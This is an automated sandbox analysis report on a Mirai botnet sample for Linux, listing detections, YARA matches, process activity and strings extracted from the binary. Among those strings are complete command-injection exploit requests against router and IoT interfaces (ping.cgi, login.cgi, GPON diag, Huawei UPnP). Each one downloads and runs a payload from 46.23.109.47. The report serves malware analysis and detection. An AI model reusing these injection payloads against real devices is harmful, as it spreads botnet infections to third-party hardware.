Linux Analysis Report
w9J4jyf7oY

Overview

General Information

Sample Name: w9J4jyf7oY
Analysis ID: 679627
MD5: bb2f72c63c8c0427d31a757dfa190260
SHA1: 035b12d2be4f11e9ebe390aadab1205a599c6432
SHA256: 2e717964f7f88a60459e708ac92be181d0c3899fd3ce6b60c34624b0402f78a0
Tags: 32, elf, mirai, motorola

Detection

Mirai
Score: 64
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Yara signature match
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

AV Detection

Source: w9J4jyf7oY Avira: detected
Source: w9J4jyf7oY Virustotal: Detection: 58%
Source: w9J4jyf7oY ReversingLabs: Detection: 62%
Source: /tmp/w9J4jyf7oY (PID: 6219) Socket: 127.0.0.1::44455
Source: w9J4jyf7oY String found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
Source: w9J4jyf7oY String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
Source: w9J4jyf7oY String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
Source: w9J4jyf7oY String found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
Source: w9J4jyf7oY String found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: w9J4jyf7oY String found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
Source: w9J4jyf7oY String found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
Source: w9J4jyf7oY String found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Source: w9J4jyf7oY String found in binary or memory: http://purenetworks.com/HNAP1/
Source: w9J4jyf7oY String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: w9J4jyf7oY String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: w9J4jyf7oY, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6222.1.00007fac24021000.00007fac24022000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6219.1.00007fac2401f000.00007fac24021000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6222.1.00007fac2401f000.00007fac24021000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6219.1.00007fac24021000.00007fac24022000.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6222.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6219.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: Initial sample Potential command found: GET oV
Source: Initial sample Potential command found: GET /ping.cgi?pingIpAddress=google.fr;wget%20http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114'$ HTTP/1.1
Source: Initial sample Potential command found: GET /login.cgi?cli=aa%20aa%27;wget%20http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+46.23.109.47/Cloud/Jaws.sh;chmod+777+*;sh+Jaws.sh HTTP/1.1
Source: Initial sample Potential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
Source: Initial sample Potential command found: GET /index.php?s=/index/hink
Source: ELF static info symbol of initial sample .symtab present: no
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0
Source: classification engine Classification label: mal64.troj.lin@0/0@0/0
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/6230/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/6231/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1582/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2033/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2275/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/3088/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/6191/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/6190/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1612/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1579/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1699/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1335/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1698/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2028/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1334/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1576/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2302/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/3236/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2025/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2146/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/910/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/6227/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/912/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/6229/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/517/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/759/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/6228/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2307/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/918/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/6241/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/6243/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/4462/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/6245/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/6246/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1594/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2285/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2281/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1349/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1623/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/761/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1622/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/884/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1983/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2038/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1344/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1465/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1586/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1463/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2156/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/800/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/6238/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/801/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/6237/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1629/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1627/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1900/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/6252/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/4470/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/4471/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/6254/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/3021/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/491/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2294/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2050/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1877/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/772/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1633/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1599/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1632/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/774/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1477/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/654/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/896/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1476/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1872/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2048/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/655/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1475/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2289/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/656/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/777/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/657/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/6249/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/658/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/6248/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/4468/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/4469/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/4502/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/419/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/936/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1639/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1638/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2208/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2180/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1809/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1494/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1890/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2063/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/2062/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1888/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1886/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/420/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1489/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/785/exe
Source: /tmp/w9J4jyf7oY (PID: 6221) File opened: /proc/1642/exe
Source: /tmp/w9J4jyf7oY (PID: 6219) Queries kernel information via 'uname'
Source: w9J4jyf7oY, 6219.1.00007ffeb0ce0000.00007ffeb0d01000.rw-.sdmp, w9J4jyf7oY, 6222.1.00007ffeb0ce0000.00007ffeb0d01000.rw-.sdmp Binary or memory string: /usr/bin/qemu-m68k
Source: w9J4jyf7oY, 6219.1.0000560d943cf000.0000560d94454000.rw-.sdmp, w9J4jyf7oY, 6222.1.0000560d943cf000.0000560d94454000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/m68k
Source: w9J4jyf7oY, 6219.1.00007ffeb0ce0000.00007ffeb0d01000.rw-.sdmp, w9J4jyf7oY, 6222.1.00007ffeb0ce0000.00007ffeb0d01000.rw-.sdmp Binary or memory string: x86_64/usr/bin/qemu-m68k/tmp/w9J4jyf7oYSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/w9J4jyf7oY
Source: w9J4jyf7oY, 6219.1.0000560d943cf000.0000560d94454000.rw-.sdmp, w9J4jyf7oY, 6222.1.0000560d943cf000.0000560d94454000.rw-.sdmp Binary or memory string: V!/etc/qemu-binfmt/m68k

Stealing of Sensitive Information

Source: Yara match File source: w9J4jyf7oY, type: SAMPLE
Source: Yara match File source: 6222.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6219.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: w9J4jyf7oY, type: SAMPLE
Source: Yara match File source: 6222.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6219.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY
No contacted IP infos